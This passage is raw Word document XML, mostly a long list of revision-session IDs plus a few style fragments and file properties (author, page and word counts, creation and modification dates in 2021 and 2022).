    <w:rsid w:val="57DA1BD3"/>
    <w:rsid w:val="57E95FCD"/>
    <w:rsid w:val="57EB6E59"/>
    <w:rsid w:val="57F74DAD"/>
    <w:rsid w:val="57FA7D5C"/>
    <w:rsid w:val="57FC25AC"/>
    <w:rsid w:val="58047414"/>
    <w:rsid w:val="581B741B"/>
    <w:rsid w:val="58216E0C"/>
    <w:rsid w:val="58245F66"/>
    <w:rsid w:val="58632D83"/>
    <w:rsid w:val="587323E3"/>
    <w:rsid w:val="587D3C9C"/>
    <w:rsid w:val="58824C00"/>
    <w:rsid w:val="589B1FDA"/>
    <w:rsid w:val="589D4F71"/>
    <w:rsid w:val="58A448BD"/>
    <w:rsid w:val="58A84A78"/>
    <w:rsid w:val="58AF51F2"/>
    <w:rsid w:val="58B011B7"/>
    <w:rsid w:val="58C10B70"/>
    <w:rsid w:val="58CD66DE"/>
    <w:rsid w:val="58D02170"/>
    <w:rsid w:val="58D13044"/>
    <w:rsid w:val="58D90F5E"/>
    <w:rsid w:val="58E62FF6"/>
    <w:rsid w:val="59226710"/>
    <w:rsid w:val="59360B8E"/>
    <w:rsid w:val="59393531"/>
    <w:rsid w:val="596D6154"/>
    <w:rsid w:val="59860D6D"/>
    <w:rsid w:val="59892AA9"/>
    <w:rsid w:val="598B2E0E"/>
    <w:rsid w:val="59A70984"/>
    <w:rsid w:val="59B828D7"/>
    <w:rsid w:val="59DB19BD"/>
    <w:rsid w:val="5A1F2C8E"/>
    <w:rsid w:val="5A2C3599"/>
    <w:rsid w:val="5A485913"/>
    <w:rsid w:val="5A4E311A"/>
    <w:rsid w:val="5A87083C"/>
    <w:rsid w:val="5AAA6899"/>
    <w:rsid w:val="5AAE56BF"/>
    <w:rsid w:val="5ABD1384"/>
    <w:rsid w:val="5AC01C77"/>
    <w:rsid w:val="5B0A0402"/>
    <w:rsid w:val="5B16644F"/>
    <w:rsid w:val="5B1F5419"/>
    <w:rsid w:val="5B463898"/>
    <w:rsid w:val="5B4D3789"/>
    <w:rsid w:val="5B5A62E0"/>
    <w:rsid w:val="5BC577AE"/>
    <w:rsid w:val="5BE50A91"/>
    <w:rsid w:val="5BE92D13"/>
    <w:rsid w:val="5C1A7442"/>
    <w:rsid w:val="5C285B9F"/>
    <w:rsid w:val="5C406063"/>
    <w:rsid w:val="5C5D4C6B"/>
    <w:rsid w:val="5C9B2FC8"/>
    <w:rsid w:val="5CA90C94"/>
    <w:rsid w:val="5CBE1089"/>
    <w:rsid w:val="5CC6417E"/>
    <w:rsid w:val="5CD92890"/>
    <w:rsid w:val="5CFD0C1A"/>
    <w:rsid w:val="5CFE24D4"/>
    <w:rsid w:val="5D0061F1"/>
    <w:rsid w:val="5D0E4D70"/>
    <w:rsid w:val="5D4E258A"/>
    <w:rsid w:val="5D51064E"/>
    <w:rsid w:val="5D8A1126"/>
    <w:rsid w:val="5DAA7B76"/>
    <w:rsid w:val="5DC3336A"/>
    <w:rsid w:val="5DC46C33"/>
    <w:rsid w:val="5E0E2A3A"/>
    <w:rsid w:val="5E464500"/>
    <w:rsid w:val="5E6D6032"/>
    <w:rsid w:val="5E726415"/>
    <w:rsid w:val="5E850EF2"/>
    <w:rsid w:val="5E8A659F"/>
    <w:rsid w:val="5E8B3CF2"/>
    <w:rsid w:val="5EB00A8F"/>
    <w:rsid w:val="5EE97C2E"/>
    <w:rsid w:val="5F04575B"/>
    <w:rsid w:val="5F3C7B98"/>
    <w:rsid w:val="5F42127E"/>
    <w:rsid w:val="5F4F7567"/>
    <w:rsid w:val="5F511042"/>
    <w:rsid w:val="5F63408F"/>
    <w:rsid w:val="5F815E75"/>
    <w:rsid w:val="5F85405E"/>
    <w:rsid w:val="5F936CD2"/>
    <w:rsid w:val="5FA338C4"/>
    <w:rsid w:val="5FAE4992"/>
    <w:rsid w:val="5FB9646B"/>
    <w:rsid w:val="5FE25289"/>
    <w:rsid w:val="5FEF12BB"/>
    <w:rsid w:val="5FF73880"/>
    <w:rsid w:val="5FFA4436"/>
    <w:rsid w:val="5FFE06C8"/>
    <w:rsid w:val="6011013D"/>
    <w:rsid w:val="602560C3"/>
    <w:rsid w:val="603043C6"/>
    <w:rsid w:val="603175EF"/>
    <w:rsid w:val="60472C13"/>
    <w:rsid w:val="60490D04"/>
    <w:rsid w:val="60494158"/>
    <w:rsid w:val="606A5708"/>
    <w:rsid w:val="60F3659B"/>
    <w:rsid w:val="61067D9F"/>
    <w:rsid w:val="612F4B1A"/>
    <w:rsid w:val="61E460E2"/>
    <w:rsid w:val="61E765D5"/>
    <w:rsid w:val="61FA3B70"/>
    <w:rsid w:val="61FB6F54"/>
    <w:rsid w:val="61FD60BF"/>
    <w:rsid w:val="62010B9D"/>
    <w:rsid w:val="6223048F"/>
    <w:rsid w:val="62373BF3"/>
    <w:rsid w:val="626B1581"/>
    <w:rsid w:val="626E7468"/>
    <w:rsid w:val="62746190"/>
    <w:rsid w:val="62AE6A35"/>
    <w:rsid w:val="62BB0757"/>
    <w:rsid w:val="62C22F00"/>
    <w:rsid w:val="62D70CAC"/>
    <w:rsid w:val="62FB17AF"/>
    <w:rsid w:val="631318CB"/>
    <w:rsid w:val="63132A78"/>
    <w:rsid w:val="63342FB5"/>
    <w:rsid w:val="63483330"/>
    <w:rsid w:val="634E2D46"/>
    <w:rsid w:val="638976BD"/>
    <w:rsid w:val="639A7059"/>
    <w:rsid w:val="63CB508F"/>
    <w:rsid w:val="63DD4BDD"/>
    <w:rsid w:val="63DE0F7C"/>
    <w:rsid w:val="64285696"/>
    <w:rsid w:val="642A3CBE"/>
    <w:rsid w:val="644B7295"/>
    <w:rsid w:val="64A519F0"/>
    <w:rsid w:val="64D766D2"/>
    <w:rsid w:val="64ED37CC"/>
    <w:rsid w:val="654E0D0E"/>
    <w:rsid w:val="655421EC"/>
    <w:rsid w:val="655B7752"/>
    <w:rsid w:val="657B3125"/>
    <w:rsid w:val="659A70EE"/>
    <w:rsid w:val="65AE680B"/>
    <w:rsid w:val="65C97E57"/>
    <w:rsid w:val="65E35BC7"/>
    <w:rsid w:val="65E9335D"/>
    <w:rsid w:val="65EE0988"/>
    <w:rsid w:val="66554A7D"/>
    <w:rsid w:val="66614F2A"/>
    <w:rsid w:val="66667EFF"/>
    <w:rsid w:val="666C60FA"/>
    <w:rsid w:val="667907F5"/>
    <w:rsid w:val="669C06CB"/>
    <w:rsid w:val="66B02649"/>
    <w:rsid w:val="66C35938"/>
    <w:rsid w:val="66D337FB"/>
    <w:rsid w:val="66E90E11"/>
    <w:rsid w:val="66EC2FB2"/>
    <w:rsid w:val="66F65B5A"/>
    <w:rsid w:val="671111D4"/>
    <w:rsid w:val="67117BB0"/>
    <w:rsid w:val="67465188"/>
    <w:rsid w:val="67817CBB"/>
    <w:rsid w:val="679A04C0"/>
    <w:rsid w:val="67A81AFB"/>
    <w:rsid w:val="67B9301D"/>
    <w:rsid w:val="6841318C"/>
    <w:rsid w:val="68507B44"/>
    <w:rsid w:val="68592D51"/>
    <w:rsid w:val="68603843"/>
    <w:rsid w:val="687B7962"/>
    <w:rsid w:val="688F48D8"/>
    <w:rsid w:val="68974562"/>
    <w:rsid w:val="689F0BA3"/>
    <w:rsid w:val="68A95332"/>
    <w:rsid w:val="68AE464C"/>
    <w:rsid w:val="68B86554"/>
    <w:rsid w:val="68C46C57"/>
    <w:rsid w:val="68C91490"/>
    <w:rsid w:val="68CC7BC2"/>
    <w:rsid w:val="68D4508E"/>
    <w:rsid w:val="68FC436C"/>
    <w:rsid w:val="69056417"/>
    <w:rsid w:val="691502A9"/>
    <w:rsid w:val="6926304E"/>
    <w:rsid w:val="69376D0C"/>
    <w:rsid w:val="695326D6"/>
    <w:rsid w:val="69543B1A"/>
    <w:rsid w:val="695709E4"/>
    <w:rsid w:val="697D3430"/>
    <w:rsid w:val="69C5164A"/>
    <w:rsid w:val="6A0965E1"/>
    <w:rsid w:val="6A152509"/>
    <w:rsid w:val="6A323EDB"/>
    <w:rsid w:val="6A3D1D5E"/>
    <w:rsid w:val="6A3E4EF8"/>
    <w:rsid w:val="6A533ABF"/>
    <w:rsid w:val="6A5342E7"/>
    <w:rsid w:val="6A897E36"/>
    <w:rsid w:val="6A8A080C"/>
    <w:rsid w:val="6A8D7D74"/>
    <w:rsid w:val="6A931B3A"/>
    <w:rsid w:val="6A9B3C58"/>
    <w:rsid w:val="6AC57020"/>
    <w:rsid w:val="6ACB383A"/>
    <w:rsid w:val="6ADD0B91"/>
    <w:rsid w:val="6AED01BA"/>
    <w:rsid w:val="6AF60FF1"/>
    <w:rsid w:val="6B425575"/>
    <w:rsid w:val="6B5E6527"/>
    <w:rsid w:val="6B606164"/>
    <w:rsid w:val="6BA84BF2"/>
    <w:rsid w:val="6BFB7F6E"/>
    <w:rsid w:val="6C273151"/>
    <w:rsid w:val="6C294E4E"/>
    <w:rsid w:val="6C2D7EBD"/>
    <w:rsid w:val="6C583C69"/>
    <w:rsid w:val="6CC371BE"/>
    <w:rsid w:val="6CC62A12"/>
    <w:rsid w:val="6CD35404"/>
    <w:rsid w:val="6CE40562"/>
    <w:rsid w:val="6CF22A48"/>
    <w:rsid w:val="6CFB4C72"/>
    <w:rsid w:val="6D1574E4"/>
    <w:rsid w:val="6D573C7E"/>
    <w:rsid w:val="6D5E3812"/>
    <w:rsid w:val="6D62523A"/>
    <w:rsid w:val="6D9A24A8"/>
    <w:rsid w:val="6DD237D1"/>
    <w:rsid w:val="6DE965C6"/>
    <w:rsid w:val="6E1C4673"/>
    <w:rsid w:val="6E4D1B1F"/>
    <w:rsid w:val="6E56694D"/>
    <w:rsid w:val="6E5E5D49"/>
    <w:rsid w:val="6E8F306D"/>
    <w:rsid w:val="6EBA6306"/>
    <w:rsid w:val="6ECA0050"/>
    <w:rsid w:val="6ED7396D"/>
    <w:rsid w:val="6F2C3472"/>
    <w:rsid w:val="6F33164D"/>
    <w:rsid w:val="6F5026F1"/>
    <w:rsid w:val="6FBA2D2C"/>
    <w:rsid w:val="6FCA4C09"/>
    <w:rsid w:val="6FDD4D9E"/>
    <w:rsid w:val="7022440E"/>
    <w:rsid w:val="702D378D"/>
    <w:rsid w:val="703C105F"/>
    <w:rsid w:val="7066321A"/>
    <w:rsid w:val="708E651F"/>
    <w:rsid w:val="70A50A9B"/>
    <w:rsid w:val="70B048EA"/>
    <w:rsid w:val="70C81AC3"/>
    <w:rsid w:val="70EC50E6"/>
    <w:rsid w:val="71030C26"/>
    <w:rsid w:val="71130BE7"/>
    <w:rsid w:val="712355C5"/>
    <w:rsid w:val="71754CC7"/>
    <w:rsid w:val="717F0A22"/>
    <w:rsid w:val="71824465"/>
    <w:rsid w:val="718660D8"/>
    <w:rsid w:val="719206E7"/>
    <w:rsid w:val="71C14C57"/>
    <w:rsid w:val="71DD0FF2"/>
    <w:rsid w:val="71FC6D9A"/>
    <w:rsid w:val="7207487A"/>
    <w:rsid w:val="726332B5"/>
    <w:rsid w:val="72735416"/>
    <w:rsid w:val="72876AF8"/>
    <w:rsid w:val="72877432"/>
    <w:rsid w:val="7288543B"/>
    <w:rsid w:val="729E2AD1"/>
    <w:rsid w:val="72A67882"/>
    <w:rsid w:val="72C87941"/>
    <w:rsid w:val="72C87F2D"/>
    <w:rsid w:val="72D41495"/>
    <w:rsid w:val="72DE6995"/>
    <w:rsid w:val="730D45C3"/>
    <w:rsid w:val="73166184"/>
    <w:rsid w:val="73442667"/>
    <w:rsid w:val="73705370"/>
    <w:rsid w:val="7379769F"/>
    <w:rsid w:val="738879AF"/>
    <w:rsid w:val="73AE761D"/>
    <w:rsid w:val="73B133E7"/>
    <w:rsid w:val="73E05F83"/>
    <w:rsid w:val="742A206F"/>
    <w:rsid w:val="745A0F89"/>
    <w:rsid w:val="746E3725"/>
    <w:rsid w:val="747819C5"/>
    <w:rsid w:val="747A122A"/>
    <w:rsid w:val="747E78EB"/>
    <w:rsid w:val="74AF752D"/>
    <w:rsid w:val="74EA49E9"/>
    <w:rsid w:val="74EA4D4B"/>
    <w:rsid w:val="74FF7B30"/>
    <w:rsid w:val="750A1EBA"/>
    <w:rsid w:val="750E0977"/>
    <w:rsid w:val="75145083"/>
    <w:rsid w:val="75222C5E"/>
    <w:rsid w:val="752552E2"/>
    <w:rsid w:val="75697D9A"/>
    <w:rsid w:val="756C6822"/>
    <w:rsid w:val="758C5E59"/>
    <w:rsid w:val="75C11E39"/>
    <w:rsid w:val="75DC42CE"/>
    <w:rsid w:val="75EB7346"/>
    <w:rsid w:val="75F43E4C"/>
    <w:rsid w:val="75FA700A"/>
    <w:rsid w:val="7603070C"/>
    <w:rsid w:val="760E4975"/>
    <w:rsid w:val="76266C31"/>
    <w:rsid w:val="76451FB5"/>
    <w:rsid w:val="76524638"/>
    <w:rsid w:val="7655531A"/>
    <w:rsid w:val="768410A4"/>
    <w:rsid w:val="76DD7CE6"/>
    <w:rsid w:val="77170ABA"/>
    <w:rsid w:val="772649AD"/>
    <w:rsid w:val="772D570B"/>
    <w:rsid w:val="77400E80"/>
    <w:rsid w:val="774F5F90"/>
    <w:rsid w:val="77506CFE"/>
    <w:rsid w:val="7761210A"/>
    <w:rsid w:val="776A32A1"/>
    <w:rsid w:val="77BA4C6D"/>
    <w:rsid w:val="77BD649F"/>
    <w:rsid w:val="77C61AF3"/>
    <w:rsid w:val="77D43EBA"/>
    <w:rsid w:val="77DF13A6"/>
    <w:rsid w:val="7811175C"/>
    <w:rsid w:val="78317090"/>
    <w:rsid w:val="78320BCA"/>
    <w:rsid w:val="7843288B"/>
    <w:rsid w:val="78780B69"/>
    <w:rsid w:val="789A2BF8"/>
    <w:rsid w:val="789A34AB"/>
    <w:rsid w:val="789E262C"/>
    <w:rsid w:val="78A5544D"/>
    <w:rsid w:val="78B466CF"/>
    <w:rsid w:val="78D22606"/>
    <w:rsid w:val="7930594D"/>
    <w:rsid w:val="79421B3B"/>
    <w:rsid w:val="79554E02"/>
    <w:rsid w:val="79893EBD"/>
    <w:rsid w:val="79B97CF8"/>
    <w:rsid w:val="79E73432"/>
    <w:rsid w:val="79F51C22"/>
    <w:rsid w:val="7A313ED6"/>
    <w:rsid w:val="7A44557B"/>
    <w:rsid w:val="7A4A7D58"/>
    <w:rsid w:val="7A675E75"/>
    <w:rsid w:val="7A6E5958"/>
    <w:rsid w:val="7A7F4C89"/>
    <w:rsid w:val="7AA062A1"/>
    <w:rsid w:val="7AEE4AD3"/>
    <w:rsid w:val="7AF50D13"/>
    <w:rsid w:val="7B441F0A"/>
    <w:rsid w:val="7B7F4BCA"/>
    <w:rsid w:val="7B895A32"/>
    <w:rsid w:val="7BB40647"/>
    <w:rsid w:val="7BF03F01"/>
    <w:rsid w:val="7C0B7F21"/>
    <w:rsid w:val="7C0E4AAD"/>
    <w:rsid w:val="7C4011F5"/>
    <w:rsid w:val="7C46427B"/>
    <w:rsid w:val="7C6B31B9"/>
    <w:rsid w:val="7C8B3CA8"/>
    <w:rsid w:val="7CAD4C53"/>
    <w:rsid w:val="7CBC587D"/>
    <w:rsid w:val="7CF00850"/>
    <w:rsid w:val="7CF75E88"/>
    <w:rsid w:val="7CF77D2A"/>
    <w:rsid w:val="7D1C35B4"/>
    <w:rsid w:val="7D253FC2"/>
    <w:rsid w:val="7D346633"/>
    <w:rsid w:val="7D3916D5"/>
    <w:rsid w:val="7D3E0581"/>
    <w:rsid w:val="7D3E4518"/>
    <w:rsid w:val="7D4A05CF"/>
    <w:rsid w:val="7D8D0911"/>
    <w:rsid w:val="7DCC19D7"/>
    <w:rsid w:val="7E2D28F5"/>
    <w:rsid w:val="7E2F0860"/>
    <w:rsid w:val="7E31543E"/>
    <w:rsid w:val="7E470B5C"/>
    <w:rsid w:val="7E491F90"/>
    <w:rsid w:val="7E595A64"/>
    <w:rsid w:val="7E661C46"/>
    <w:rsid w:val="7E880E2B"/>
    <w:rsid w:val="7E896B44"/>
    <w:rsid w:val="7EB11359"/>
    <w:rsid w:val="7ECC1B1E"/>
    <w:rsid w:val="7ECC4139"/>
    <w:rsid w:val="7ED1403B"/>
    <w:rsid w:val="7EE4521B"/>
    <w:rsid w:val="7EF131E2"/>
    <w:rsid w:val="7EF720C8"/>
    <w:rsid w:val="7F6B156D"/>
    <w:rsid w:val="7FBB52AA"/>
    <w:rsid w:val="7FEA0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HAnsi" w:hAnsiTheme="minorHAns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cs="Times New Roman"/>
      <w:kern w:val="0"/>
    </w:r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styleId="10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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable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jpe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287</Pages>
  <Words>42535</Words>
  <Characters>150003</Characters>
  <Lines>1696</Lines>
  <Paragraphs>477</Paragraphs>
  <TotalTime>53</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>228669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2021-08-06T08:32:00Z</dcterms:created>
  <dc:creator>Capricornus</dc:creator>
  <cp:lastModifiedBy>繁星落</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-22T04:10:14Z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C0333D8246C544C48C0C8FBF875432D6</vt:lpwstr>
  </property>
</Properties>
</file>